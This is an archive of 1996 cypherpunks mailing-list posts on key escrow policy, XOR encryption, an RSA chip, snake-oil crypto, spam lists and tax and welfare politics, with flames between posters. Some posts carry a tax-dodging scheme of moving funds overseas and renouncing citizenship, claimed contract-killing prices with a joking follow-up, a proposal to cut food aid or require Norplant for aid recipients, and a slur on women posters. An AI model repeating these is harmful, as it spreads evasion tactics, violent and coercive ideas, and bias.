>are not "bearer instruments." I could probably relocate to a foreign haven
>and sell the assets before the IRS would even notice...unless they
>computerize. I suspect this is coming.)

But since a 10-year old (who is willing to break the law) can defeat their
expat tax, what difference does it make.  All one has to do is cash out,
transfer all funds overseas, follow them, and renounce.  Move the funds
around a little.  It's not tax fraud (no false documents have been uttered
-- indeed no documents at all).  Just take your marbles and go home.

DCF  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 13:27:32 +0800
To: "<attila@primenet.com>
Subject: Re: "But if it saves just one child."
Message-ID: <ae64aebc0902100428a4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:52 AM 9/18/96, "" <pstira@escape.com> wrote:
>On Mon, 16 Sep 1996, attila wrote:
>
>> = .The rallying cry heard so often these days: "But if it saves just one
>>child."
>> = .
>
>
>ACCKKKKKIK.
>
>SYN
>ACK
>GAK
>BLAH.
>
>Read some Ayn Rand.
>This must end.
>
>IOW:  I call bullshit.  I call total bullshit.
>The net, fomerly my oasis, needs death.

Millie,

First, Attila was quoting my comment. Second, this was sarcasm.

(Or, variously, facetiousness, tongue-in-cheek, and other varieties of irony.)

You really need to learn when someone is _supporting_ your point of view
through such uses of irony, rather than going ballistic, Just a Modest
Proposal, as it were, he said Swiftly.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 18 Sep 1996 08:28:14 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Diffie Hellman - logs in Galois fields
Message-ID: <842988785.23058.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I think polluting this mailing list with trivial questions such as this is
> just as bad as polluting it with personal attacks. Read the FAQs.

Get a fucking life, seeing as you haven`t yet posted anything 
relating remotely to the technical aspects of cryptography to this 
list I think you need to take a long hard look at what your saying 
loser....

 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 18 Sep 1996 20:12:19 +0800
To: cypherpunks@toad.com
Subject: Re: Redundancy in XOR encryption
Message-ID: <842988795.23113.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> > Compress P to get perfect compression (ie. 0 redundancy)
> > Encrypt F (the compressed text) using a repeated key XOR
> > 
> > of course this is all rather theoretical as there is no such thing as
> > perfect compression, but I just thought it might be interesting to
> > see if this is indeed strong, superficially it appears so to me...
> > 
> 
> Paul:
>    I think that if the cryptanalyst knows that F has zero redundancy
> that he can run searches from 0 to n bits for the key and have
> the computer flag solutions that have zero redundancy.  

I never though of that.
 
>    I also think that a perfectly compressed file would have a relative
> entropy value close to one also, hence the computer could flag possibles 
> that have both characteristics.

yeah, these two are reasonably unlikely to occur together (only a 
reasoned guess, anyone got any comments on this?)
so we really have a weakish system.
 
>    Hence, instead of searching for plaintext by counting coincidences,
> we are searching the decrypts for solutions that have zero redundancy
> and a relative entropy value close to one.  How many solutions will
> have both these qualities?  I don't know.  But if the compression method 
> is known, brute force will be tried, and only having to try to 
> decompress (read) data that has the resultant characteristics
> of compressed information will speed things up by quite a bit.

Yeah, this is still a form of brute force but I was thinking of this 
in terms of a smallish (sub 200 bit) key, so brute force against 
solutions with 0 entropy is a realistic possibility.

 
anyone else got a faster way to attack this highly theoretical, 
will-never-be-implemented, type system??

I`d imagine there is some sort of way to measure the entropy "mixed 
in" by the XOR thus giving a foothold in the key, but I can`t think 
of anything right now, anyone got any ideas? 


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 18 Sep 1996 13:51:19 +0800
To: cypherpunks@toad.com
Subject: RSA chip spec dist. paused until tomorrow
Message-ID: <Pine.3.89.9609171941.A9162-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain


Due to the overwhelming number of requests for the new RSA chip 
data sheets, I am moving from a fax to a web distribution.

A fellow CP is currently scanning in the 28 page specs. We will post the URL 
tomorrow.

If the chip and the RSA/DES ISA board (using the chip) currently in my 
possession work as well as I hope they do, either the company I work for 
or I will most likely distribute them.

I have not yet received a request for the one loaner chip. Are there no 
hardware-hacking CPs in the SF Bay Area? That seems hard to believe.

--Lucky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 13:41:10 +0800
To: cypherpunks@toad.com
Subject: Re: The GAK Momentum is Building...
Message-ID: <ae64afeb0a0210046fbe@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 AM 9/18/96, an12054 (S. Boxx) wrote:

>the Clipper proposals are increasingly moving into the
>area of "key management". large companies will always
>want key management features, to deal with employees who
>forget passwords, leave the company, etc.-- face it, this
>is a simple reality. essentially all the latest
>moves amount to, imho, is the government trying to get
>its fingers into these key management infrastructures.

Companies wishing to tell their employees how and when they may encrypt
communications is something I have no problem with. Corporations do this
all the time, and even make various arrangements with other companies for
various services.

However, making the government a _required_ part of such plans implies a
motive that is not at all the same as what companies wish (mostly, disaster
recovery). And, as has been noted so many times by so many of us, whatever
the motivations for corporate key escrow systems for disaster planning are,
there are no motivations for key escrow for _communications_. If the sender
dies, or leaves, or whatever, the company can reconstruct his
communications from _his_ key. Or the receiving side can reconstruct the
recipients messages from _his_ side.

The only party interested in having access to "in transit" communications
are the wiretappers and SIGINT folks. Think about it. No company I can
think of is interested in reconstructing messages from the _actual
communications_, only from the keys of employees. The NSA and FBI, however,
are _keenly_ interested in reconstructing messages from intercepts, of
course, and hence are pushing for escrow of _communications_ keys!

Furthermore, the main worry (for me, at least) is that the government hopes
to get its Clipper IV scheme accepted (by means of export laws) at some
large fraction of important corporate accounts, not the least of which will
be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players
in the "infrastructure" business. Once most of these have "bought off" on
GAK, pressure will be intense to universalize the process, to make it a
felony _not_ to use a "Key Authority."

(BTW, I predict that the tainted term "key escrow" is now gone from the
official lexicon. I haven't seen the Clipper IV proposal, but I surmise
that the baggage the term "key escrow" carries means that some more
benign-sounding term will be used in the final proposal. Something like
"Key Recovery System." You heard it here.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Tue, 17 Sep 1996 21:51:27 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <199609170954.TAA23685@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>And this?  Mr. Green hardly advocated an authortarian regime, quite the
>contrary, he simply advocated one which refused to hand out money to every
>outstretched hand.

and the hands are usually those of a forgein government anyway...not 
the "starving masses". Not only is the money I pay as tax be used 
for funding the country I am in...but also the military in others.

> In article <Pine.3.89.9609152124.A20702-0100000@netcom9>,
> Lucky Green  <shamrock@netcom.com> wrote:
> > On Sun, 15 Sep 1996, Dale Thorn wrote:
> > > Just a comment: "The world population really should go back to around 
> > > one billion", etc. And how could we achieve that without severe govt. 
> > > oppression, one wonders?
> > 
> > Quite simple. End all food and medical aid to developing countries paid 
> > for with money stolen at gunpoint from our citizens. Or make Norplant 
> > implants the condition for financial/in kind aid. Both US and 
> > abroad.

> 
>And this?  Mr. Green hardly advocated an authortarian regime, quite the
>contrary, he simply advocated one which refused to hand out money to every
>outstretched hand.

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Krenn <krenn@nym.alias.net>
Date: Wed, 18 Sep 1996 13:10:29 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
Message-ID: <199609180001.UAA24489@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It would be nice to have a list of actual products which are deemed
potential snake-oil. Such a list could be maintained anonymously
through a nym to avoid all the annoying legal problems with commenting
on another's product. Though truth is the best defense against libel
charges, it would be very annoying to be sued or some such by some
hairbrained snake-oil peddler.

Krenn

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj84gEnqfwPpt/QVAQEWZAP9EZ7+3dQol+ZBLYQIiEk8f8avKDje5LBh
EmE5GVxFXDgD9wAmcccMMuVxxCaUhN0kc8Q4StQ4aZGjwdrCGouHq4aNJdd73ERP
vuk+VpQrlUwSvwwPlfXKUIQrM1PHfNigXrS5OrsQe/H/GjLw2lFa/WI2urR2Cuqg
oMmtuQKrJik=
=r2wq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 18 Sep 1996 13:51:03 +0800
To: tcmay@got.net (Timothy C. May)
Subject: timmy waxes a widdle on AP
In-Reply-To: <ae636d8c02021004b22d@[207.167.93.63]>
Message-ID: <199609180311.UAA24662@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>(Hint: One reason I seldom discuss AP is that to me it's just a special
>case of the larger issue of untraceable markets for such acts, something
>I've been worried about for almost a decade now. There is little reason to
>engage in the fiction of a "betting pool" when a hit may be untraceably
>contracted for and the standard fee ($1000 or less in some inner cities,
>$5000 for ordinary suburbanites, $30,000 or more for high-profile
>cases...so I hear) be paid with untraceable cash...as soon as truly
>untraceable digital cash becomes a reality.)

I always thought you hated to discuss AP because you didn't want
to appear overly knowledgeable on the subject.. heh heh

hmmm, interesting points. sounds like a *lucrative* business. 
perhaps even some major *investment*opportunities* involved, eh!!!

but I'm still a bit confused about those prices. what determines
them, anyway? risk to the assassin? it seems that it ought to be
as easy to snuff out one person as it would another. e.g. everybody
walks alone out at night at different times, it seems.

perhaps we have some assassins that are offering some kind of
"value added" services to justify the difference in pricings.
otherwise, it would seem to be a scam just like IBM did with
one of their printers-- have a version that has a "slowdown
chip" in it and charge less for that one. charging what the
market will bear regardless of cost so to speak...

since you are so open to discussion of the subject, 
would you care to speculate on the cost of, say, a person
who has a large stock portfolio? or how about a cyberspace
crackpot? I guess the latter would go for something like $100
on your sliding scale and the former for 100K+, maybe?

do you have to pay different amounts of money whether you want
a special kind of arrangement like a slow, agonizing demise?
does that cost more or less than the quick and deadly type?
I must admit I'm new to the concept and could definitely use
some input from someone with some obvious knowledge on the
subject such as yourself.

I do rather like Jim Bell's ideas of pools however. maybe not
have a betting pool, but just a pool of contributions from multiple
"donors". do you think that idea has no merit? it seems like there
ought to be all kinds of uplifting applications of that 
arrangement, hmmmm?

so who are your "sources" for those estimates, anyway, timmy?

hee, hee. be vewry carefwul!!! we're hunting wabbits!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 18 Sep 1996 14:59:43 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <ae64afeb0a0210046fbe@[207.167.93.63]>
Message-ID: <199609180338.UAA27100@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



[business key management plans/infrastructures]
>However, making the government a _required_ part of such plans implies a
>motive that is not at all the same as what companies wish (mostly, disaster
>recovery).

the distinction lies in the terminology. what does it mean, "required
part of the plan". if it essentially amounts to nothing more than 
the government saying, "you must give us keys when we present you
with a subpoena/warrant", then that's no different than the system
we have today. again, granted, laws specifically aimed at crypto
can tend to take up a life off their own. but my main point was
that the gloom-and-doom peddled by you and lucky green over clipper
just doesn't mesh with the actual events. the government has 
visibly had to *backpeddle* *numerous* times in all of its 
clipper proposals. I see no evidence that the latest proposals
are going to be any different. what annoys me is people who are
crying wolf all the time, and even when it seems there are no
wolves around, or they have temporarily receded,
they say, "I told you so". "the wolves really are going to
devour you, just you wait and see"

 And, as has been noted so many times by so many of us, whatever
>the motivations for corporate key escrow systems for disaster planning are,
>there are no motivations for key escrow for _communications_. If the sender
>dies, or leaves, or whatever, the company can reconstruct his
>communications from _his_ key. Or the receiving side can reconstruct the
>recipients messages from _his_ side.

this doesn't parse to me. the simple situation that may occur:
employee [x] creates a key on behalf of company [y]. employee
[x] forgets or misplaces the key. company [y] needs to retrieve
key, and cannot go to other company to get it (imagine situations
such as encrypted internal files, for example, although it holds
equally well for communications-- it would be very embarrassing
to ask another company for the key to decode something you sent
them because you misplaced it). 
I think cpunks tend to blur and obfuscate this use of crypto-- 
i.e. nonpersonal use within companies.

what you seem to be saying is that companies should not have to
escrow keys involving communications. i.e. the communications
should be readable only between the communicators. but this makes
no sense to me either. companies wish to have permanent record
of all official correspondence. they don't send messages and then
don't keep them around, like guerilla cypherpunks spend all day
doing. ("YIKES!!! that msg has been on my hard drive 5 minutes!!
better delete it FAST")

>The only party interested in having access to "in transit" communications
>are the wiretappers and SIGINT folks. Think about it. No company I can
>think of is interested in reconstructing messages from the _actual
>communications_, only from the keys of employees.

bzzzt. "actual communications" == records of transactions between
companies. we are talking about everything that companies send back
and forth: bills, contracts, agreements, etc.-- virtually everything
that companies send each other, they keep on permanent record.

 The NSA and FBI, however,
>are _keenly_ interested in reconstructing messages from intercepts, of
>course, and hence are pushing for escrow of _communications_ keys!

hmmmm, this distinction you are now promoting of communication keys,
vs. whatever other kind their are (backups?) is something I've not
noticed you or others emphasize before, I would have to think about it.
frankly I don't see a whole lot of difference between what you are
calling "communication" keys and whatever else crypto is used for.

look, consider this: the government got its tentacles into every
business key database in existence, in the sense they can easily
open them when they get wiretaps/warrants. yet individuals were still free
to send crypto everywhere. how would this be much different than
today's system, other than that the government has more efficient
access once the order is granted?

>Furthermore, the main worry (for me, at least) is that the government hopes
>to get its Clipper IV scheme accepted (by means of export laws) at some
>large fraction of important corporate accounts, not the least of which will
>be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players
>in the "infrastructure" business. Once most of these have "bought off" on
>GAK, pressure will be intense to universalize the process, to make it a
>felony _not_ to use a "Key Authority."

that's a big, big leap, the kind that cpunks always love to make to
sell you on the dystopian orwellian nightmare they are always ranting
about.  the things that companies use keys for can be pretty different from
what individuals would use them for. the government can already get
any info it wants through a subpoena or warrant from a company, and
they will comply. how is this different than what you are referring to?
you are making a leap that if companies have internal key infrastructures
to protect their information, that the restrictions on them will automatically
carry over to private communications between individuals such as in
e.g. a telephone like scenario.

look, we already today accept that employee's liberties do not 
necessarily hold within a company. the concepts of "freedom of 
speech," "privacy" etc. do not necessary hold within companies.

>(BTW, I predict that the tainted term "key escrow" is now gone from the
>official lexicon. I haven't seen the Clipper IV proposal, but I surmise
>that the baggage the term "key escrow" carries means that some more
>benign-sounding term will be used in the final proposal. Something like
>"Key Recovery System." You heard it here.)

I hate the misuse and abuse of the english language in Orwellian 
fashion (The Great Plan to Protect the Integrity of Data Communications)
as much as you do, but there are some very significant distinctions
that are being glossed over. the new proposals are radically more
diffused than the original clipper plan imho. the government is
clearly in the process of backpeddaling. it's got all the
signs of desperation imho. if they didn't succeed
with the original clipper, what makes you think the more recent
proposals are all that sinister and likely of succeeding? 

you evade my basic point: perhaps in all the key escrow language
in the bills, it would all boil down in practice to, if we
have a subpoena or a warrant, you have to give us the keys. how
is that different than what we have now?

cpunks -- I am not an apologist for clipper. but I want everyone
to realize that to promote crypto, you have to intrinsically
support some things like a robust key infrastructure. who
is going to provide it? do you think that whoever does will
be *exempt* from warrants and subpoenas? that is not a system
that we have now, nor is it likely we ever will. moreover, few
but only the most ardent extremists would argue such a system
would be incompatible with "freedom" as we understand it in 
this country.

"government == evil" is a very simplistic outlook in life that
can come back to bite you bigtime, imho. there are some people
in government that share cpunk views and could do some good
if they weren't lumped in with the evil spooks who really are
trying to enslave humanity (hee, hee)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: #6 <null@void.gov>
Date: Wed, 18 Sep 1996 14:07:48 +0800
To: cypherpunks@toad.com
Subject: Re: Anthrax on the 'net [skating rinks to be outlawed]
In-Reply-To: <9609172114.AA26321@outland>
Message-ID: <323F6EF2.5B23@void.gov>
MIME-Version: 1.0
Content-Type: text/plain


Two teens reported being propositioned, outside the neighborhood skating 
rink, to participate in the making of some kiddie porn.  They called 
police who made some arrests (I think).

The city council is considering legislation to outlaw skating rinks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 16:09:41 +0800
To: cypherpunks@toad.com
Subject: A Bizarre Increase in the Ad Hominems Here
Message-ID: <ae64c08c0b02100457ec@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




Must be the Ides of September, but there are several bizarre new attacks
lately on this list, none of them to the point, just odd ad hominems:

* Detweiler (vznuri@netcom.com) writes:

"timmy waxes a widdle on AP"

* Millie (pstira@escape.com) writes:

"Timmy boy,
I yelled at someone for this last week.
And you supported my view.

Never read Ayn Rand, eh?"

(Sadly, a large fraction of the women who have posted on our list have
written in this same kind of incoherent, rambling, makes-no-sense kind of
style. I have no idea why the percentage of such events is so high.)

* And of course Vulis has been posting his "farting" messages far and wide.

Those who legitimately disagree with my arguments should of course continue
to speak up. But those who confuse calling me "Timmy" with making
substantive arguments need to go back to school.


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tob@world.std.com (Tom Breton)
Date: Wed, 18 Sep 1996 14:38:36 +0800
To: cypherpunks@toad.com
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <199609180100.AA07744@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca writes:
> I don't think that a reasonable person would argue that medical
> insurance should be outlawed because everyone should take care of their
> own needs. A social safety net is simply a form of health and life
> insurance. Statistical arbitrage if you will. By spreading the risk you
> minimize the cost. Yes, some people will take advantage of the system.
> But like a virus, a robust system should be able to withstand this form
> of attack.


It's too bad you received such fingers-in-the-ears libertarian-scream
responses to this. You deserved a better answer than that. Not that I
entirely agree. Let me quote part of something I once wrote on
essentially this topic:

"With *real* insurance it's tough enough to root out fraud. How can an
unwritten, virtual policy, knowable only through deduction, addressing
our entire circumstances of birth, that the insured may deny contracting
to or may disagree about what the terms were, be easy to sort out?"

        Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 18 Sep 1996 15:00:42 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <ae64afeb0a0210046fbe@[207.167.93.63]>
Message-ID: <Pine.3.89.9609172050.A9162-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 17 Sep 1996, Timothy C. May wrote:
> However, making the government a _required_ part of such plans implies a
> motive that is not at all the same as what companies wish (mostly, disaster
> recovery).

The required part will come later. Meanwhile, many big players in the 
industry are volunteering to include GAK for you.

When I asked the fellow from HP that proposed the CommerceNet position
paper how the "voluntary key recovery" he was proposing on his slides
could possibly aid law enforcement against criminals who obviously 
wouldn't "escrow" their keys, he said, and I am not kidding:

"There are many possible interpretations of the words voluntary and 
mandatory." I was the *only* person in a room full of people working in the 
industry that seemed bothered by this.

> Furthermore, the main worry (for me, at least) is that the government hopes
> to get its Clipper IV scheme accepted (by means of export laws) at some
> large fraction of important corporate accounts, not the least of which will
> be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players
> in the "infrastructure" business. Once most of these have "bought off" on
> GAK, pressure will be intense to universalize the process, to make it a
> felony _not_ to use a "Key Authority."

That's exactly how it will be.

> (BTW, I predict that the tainted term "key escrow" is now gone from the
> official lexicon. I haven't seen the Clipper IV proposal, but I surmise
> that the baggage the term "key escrow" carries means that some more
> benign-sounding term will be used in the final proposal. Something like
> "Key Recovery System." You heard it here.)

Correct. As I explained in my post from the CommerceNet meeting in D.C., 
"key recovery" is the new politically correct term for GAK.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 13:28:31 +0800
To: cypherpunks@toad.com
Subject: Re: The Expat Tax Is Law - The Door Is Now Closed!
In-Reply-To: <199609171211.FAA02724@you.got.net>
Message-ID: <ZcgFuD85w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Tim May) (fart) writes:
> The imposition of draconian taxation policies effectively says that the
> U.S. is now doing what the Soviet Union did to emigrants: demand that they
> "pay back" various costs the government claimed they had incurred.

Not true.  The late Soviet Union tried asking emigrants to pay for their
higher education (i.e. college and graduate school), not the secondary
education, medical care, and other substantial costs borne by the society.
They did it as an experiment for, I think, less than a year, and stopped
because of the whining from the United States (the primary benefitiary
of the free Soviet education, whatever it was worth).

The U.S. does things the former Soviet Union would never have thought of.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 18 Sep 1996 12:06:14 +0800
To: Jim Ray <liberty@gate.net>
Subject: Re: Getting the word "GAK" into common usage
In-Reply-To: <199609121522.LAA106562@osceola.gate.net>
Message-ID: <Pine.BSI.3.91.960917212929.5280B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Sep 1996, Jim Ray wrote:

> As most of you know, I have been trying to bring "our" word, "GAK" into 
> common usage, as opposed to the "key-escrow" Newspeak proposed by some 
> (unnamed) big-government bureaucrat, and unfortunately adopted in most 
> discussions of cryptography policy, (especially those outside this forum) 
> in spite of the true English meaning of the word "escrow."

I OPPOSE THIS LIBELOUS SLANDEROUS PSHAW PSHAW GACK GAK GAKATTACK.

With all due respekt, Herr Captain, I have useth the term GAKeth for
many a spritely years and NOONE gives ME any mention.

NOONE CARES.

I feel unloved.  And, oh GAK, I feel OLDER.

hmph.

-Millie.
(upon the birthday of last week, I hereby reserve the right to be a bitch 
ONCE, JUST ONCE)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 18 Sep 1996 12:27:22 +0800
To: John Young <jya@pipeline.com>
Subject: Re: XPA_nix
In-Reply-To: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com>
Message-ID: <Pine.BSI.3.91.960917213231.5280C-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Sep 1996, John Young wrote:

> Cheswick opines,"This is the first major attack of a kind that I believe to
> be the final Internet security problem." 

Harrumph.  We should only BE so lucky.

BAD internet.
BAD.

-Millie.
(nope, it wasn't me, bah)
sfuze@tiac.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 13:23:22 +0800
To: cypherpunks@toad.com
Subject: Re: Spam blacklist project
In-Reply-To: <Pine.BSF.3.91.960917124148.16319C-100000@mcfeely.bsfs.org>
Message-ID: <ZZgFuD92w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> > You haven't answered my question, Lues. If the list of e-mail addresses of
> > people who DON'T want junk e-mail is made available for _free for FTP,
> > together with a tool for spammers to scrub their mailing lists of these
> > addresses, and an easy way for anyone to add his or her address to this
> > list for _free, then how would Slaton _sell this list to anyone?
> >
>
> Easily. What percentage of, er, mass internet advertisers would know that
> this site exists?

Some mass advertizers are pretty bright and have good brains working for
them. Others will be destroyed by the market forces.

>                   I assume it would become a very large list, and would
> make a very atractive target for someone who wanted to provide email
> addresses to others for a fee.

Most mass e-mailers are in touch with one another via DEMMA, who's been
promoting the idea of "do not e-mail" list. If such a list and the scrubbing
software are made available for free on an FTP server, they'll know about it.

If they can get away with e-mailing their stuff to hundreds of thousands of
